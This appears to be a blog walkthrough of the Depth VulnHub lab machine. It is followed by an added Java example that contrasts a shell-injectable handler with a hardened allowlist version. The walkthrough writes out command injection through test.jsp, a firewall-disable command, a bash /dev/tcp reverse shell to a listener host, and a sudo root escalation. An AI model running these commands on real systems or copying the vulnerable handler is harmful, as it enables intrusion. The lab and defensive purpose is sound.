Hi guys, a warm welcome to my blog. Today we are going to discuss the Depth VulnHub machine. It is a very easy machine that comes with an OS command injection vulnerability on the debugging page, and it runs on a Java server.
To escalate to root privileges we abuse the sudo binary.
So first, fire up the machine in VirtualBox.
Download the machine: https://www.vulnhub.com/entry/depth-1,213/
As usual, we start with an nmap scan
STEP 1: nmap -sC -sV 192.168.0.12
Further analyzing this nmap result, I found some interesting services and ports, which are SSH on 22 and HTTP on 8080, etc.
So let us visit that web page, which is http://192.168.0.12:8080
Here I checked all the links, but nothing was interesting.
So I enumerated further using the nikto tool
STEP 2: nikto -h http://192.168.0.12:8080
After analyzing this report, I found one interesting file, which is test.jsp
So let's check it at http://192.168.0.12:8080/test.jsp
Further analyzing this web page, I found that it is affected by an OS command injection vulnerability, which lets us run system commands.
So first I tried
STEP 3: ls -l /tmp
Now it lists the files in the tmp folder
So next I tried the home directory
STEP 4: ls -l /home
Now you get the username on that system, which is bill
So next I disabled the firewall of that machine
STEP 5: ssh bill@localhost sudo ufw disable
Next, we are going to write the reverse shell
Before that, set up your listener
STEP 6: nc -lvp 4242
STEP 7: ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.0.2/4242 0>&1
Booooooooommmmmmm!!!!!
Now you get a user shell on that machine
To escalate to root privileges we go for sudo binary abuse
STEP 8: sudo -l
STEP 9: sudo su
Booooooooommmmmmmmmm!!!!
Now you will get the root shell
STEP 10: cd root
STEP 11: cat flag
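
For the defensive side of the test.jsp finding, here is an added example (not from the original post; the source of test.jsp is not shown on this page). It contrasts an assumed vulnerable handler that hands the request value to a shell with a hardened one that only lists allowlisted directories through the file API. The class name, method names and the /tmp allowlist are assumptions made for illustration.

```java
import java.io.IOException;
import java.nio.file.DirectoryStream;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.List;
import java.util.Set;

public class DebugListing {
    // Directories the debug page may list (assumed policy, not from the page).
    private static final Set<Path> ALLOWED = Set.of(Paths.get("/tmp"));

    // Vulnerable pattern (assumed): the whole request value reaches a shell,
    // so any command typed into the form runs as the server account.
    static Process vulnerable(String userInput) throws IOException {
        return new ProcessBuilder("/bin/sh", "-c", userInput).start();
    }

    // Hardened: the input is treated as a path only, normalized, checked
    // against the allowlist, and listed in-process. No shell is spawned.
    static List<String> listDirectory(String userInput) throws IOException {
        Path requested = Paths.get(userInput).toAbsolutePath().normalize();
        if (!ALLOWED.contains(requested)) {
            throw new SecurityException("directory not allowed: " + requested);
        }
        List<String> names = new ArrayList<>();
        try (DirectoryStream<Path> entries = Files.newDirectoryStream(requested)) {
            for (Path entry : entries) {
                names.add(entry.getFileName().toString());
            }
        }
        return names;
    }

    public static void main(String[] args) throws IOException {
        // Inputs: an allowed path, a disallowed path, a traversal (constructed),
        // and the command strings this walkthrough typed in steps 3 and 5.
        String[] inputs = { "/tmp", "/home", "/tmp/../home", "ls -l /tmp",
                            "ssh bill@localhost sudo ufw disable" };
        for (String in : inputs) {
            try {
                System.out.println(in + " -> " + listDirectory(in).size() + " entries");
            } catch (SecurityException | InvalidPathException e) {
                System.out.println(in + " -> rejected");
            }
        }
    }
}
```

Only the first input is listed; every other input is rejected because it does not normalize to an allowlisted directory.
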
I hope you understand this article. If you like it, please donate to us.
OSCP student:
